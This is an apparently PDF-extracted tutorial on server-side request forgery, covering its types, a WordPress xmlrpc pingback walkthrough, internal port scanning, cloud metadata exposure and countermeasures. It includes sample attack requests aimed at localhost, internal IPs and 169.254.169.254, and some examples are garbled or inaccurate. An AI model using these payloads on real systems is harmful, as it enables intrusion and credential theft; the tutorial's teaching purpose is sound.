What is SSRF?

Server-side request forgery is a web based vulnerability, where

attacker take advantage over a intermediary vulnerable web
application which process special crafted malicious request to access
internal/private network resources like configuration files, user’s
personal data and financial data, which are usually located in database
protected by firewall, IDS, IPS and not exposed to public/external
network.

• In simple, the ability to manipulate a web application into

sending unauthorized requests to a third-party site or resource is
known SSRF
• SSRF is the 10th position in the OWASP 10.

For example, let say a web

application allows user to fetch
the content using URL and
displays it, if the web
application doesn’t properly
validate URL, then attacker
forges the URL parameters to access the internal confidential data.
Attacker uses the following URL to fetch the data:
http://mainsite.com/fetch.php?url=http://internal-server.com/confidential.php
SSRF can be prevented by the web application with proper validation
and sanitize of user’s input and by ensuring that requested requests
are not directed to the internal resources

Types of SSRF?
1) Full Response SSRF
In this type of SSRF attack the attacker can receive the output in
response.
The attacker abuses the trust relationship between the systems that
means usually the firewall allows only certain [IP:Port] if it is on the
same local network or it is explicitly trusted but SSRF attack breaks
the trust.
It can again be categorized into two types
i) SSRF targeting the server:
In this type of attack the adversary changes the URL to the
127.0.0.1 or localhost especially to access the confidential data of
web server internal system files.
For example, a website uses api to update scores of players during
live cricket.
GET /Cricket /Scores HTTP/1.0
Api=http://data.cricbuzz.com:8080/Cricket/Score/check?matchID=
12
Now attacker modifies it as
GET /Cricket /Scores HTTP/1.0
Api= http://localhost/admin
 ii) SSRF targeting the back-end server:
In this type of attack the adversary tries to exploit backed
components connecting to the vulnerable web server.
Considering above example, the attacker able to discover a backend
server say 192.168.04 is alive with port 80 as open, now attacker
modifies the URL as http:// 192.168.04 :80 to access it.
2) Blind SSRF:
In this type of attack, the attacker does not find any output in the
response from the server this make difficult to exploit but not
impossible.
Example:
i) Xmlrpc enabled SSRF:
XML-RPC is a feature that allows external applications to interact
with the WordPress site's core functionality.
Step-1: Identify the Wordpress website with the access to xmlrpc.php
While accessing www.mainsite.com/xmlrpc.php if we get
error change the
request to POST using Burpsuite
Step-2: List all the methods that are allowed by wordpress website
using following script
Capture the request and add the following script using Burpsuite
proxy.
Step-3: Check for pingback.ping method in the response.

Step-4: Pingback.ping is a feature by which a website send

notification to another wordpress website blogs when linking to their
content.
Use the modified request with the pingback.ping method, burp
collaborator Client link and the target site link.

Method name

Burp Collaborator link

URL of the site

Using this the website send back response to the Burp Collaborator
Client and we will get private IP of internal server.
Step-5: Check for the IP in response of the collaborator client

As in this example we are not getting sensitive data but only IP

address that is why it referred to as Blind SSRF attack

Finding an SSRF?
1) When an URL is used as parameter in the address bar

2) When the URL is value of a hidden field in a form.

3) A partial URL just as the hostname.

Impacts:
1) Bypassing WAF (web application firewall):
In general organization use WAF to secure their private network so
attacker can’t directly access but with the presence of SSRF
vulnerability malicious attacker access internal resources via a
vulnerable web server.
2) Sensitive Data Exposure:
Attacker access the internal resources residing inside the vulnerable
web server by modifying the original URL with the loopback address
that is 127.0.0.1 (In IPV4) ,::1 (In IPV6), hostname which will direct
to local file system on the server.
Example:
Original Request
GET /?url= http://mainsite.com/login.php HTTP/1.1
Modified request:
GET /?url= http://127.0.0.1/etc/Users
3) Disclosure of Cloud server meta data
Cloud services, such as AWS, offer a REST interface on
http://169.254.169.254/ where vital configurations and occasionally
authentication keys can be
retrieved. This interface
allows access to cloud
service instance metadata,
such as AWS/Amazon
EC2 and OpenStack.
 4) Scanning internal network:
Attackers can potentially scan internal networks connected to a
vulnerable server by taking advantage of a server-side request forgery
vulnerability. Even though they may not be able to extract data
directly, they can use information such as the page load time, error
messages, or banners of the probed service to indirectly determine if
the targeted service is responding or if a tested port is open.
Example:
Let’s say a website uses a service to fetch pdf files, as a security
control it checks if the response Content-Type HTTP header with the
value file/pdf if the header is missing or content-type mismatches it
shows error msg.
Now we check the behaviour of application for different request:
i. https://site com/file.php?url=https://example.com/file.pdf
It displays the pdf meaning that Content-Type header is valid
ii. https://site com/file.php?url=https://example.com/index.html
It shows Only pdf files as we changed Content-Type
iii. https://site com/file.php? url=https://example.app/
As we accessing invalid URL It shows pdf not found that
means there was an error fetching resource.
Based on this we will try the following
https://site com/file.php?url= 127.0.0.1:5000
If we get the error pdf not found, then there is no response from host
127.0.0.1 on port 5000. However, if we get Only pdf files, it means
that the internal server did respond, so there is a service running on
that port.
From this to automate the task attacker uses Burpsuite Intruder to
modify both IP address and Port number and can create a list of active
hosts with open ports.

Countermeasures:
1) Network isolation: Place the server that is vulnerable to SSRF in a
restricted network zone that is isolated from the rest of the
network, limiting the access that attackers can gain.

2) URL validation: Use regular expression matching to validate

URLs and ensure that only authorized URLs are accepted.

3) Input filtering: Filter out any input parameters that may be used to
modify the URL such as redirect parameters, to prevent attackers
from manipulating the URL

4) Content Security Policy (CSP): Use CSP to limit the sources of

content that can be loaded by the application, preventing attackers
from loading malicious content.

5) HTTP parameter binding: Bind the HTTP parameters to the

server-side code and avoid using user input directly in HTTP
requests.
References:
https://www.acunetix.com/blog/articles/server-side-request-forgery-
vulnerability/
https://owasp.org/www-
community/attacks/Server_Side_Request_Forgery
https://www.acunetix.com/blog/articles/server-side-request-forgery-
vulnerability/
https://www.invicti.com/blog/web-security/server-side-request-
forgery-vulnerability-ssrf/
https://brightsec.com/blog/ssrf-attack/#blind-ssrf
https://portswigger.net/web-security/ssrf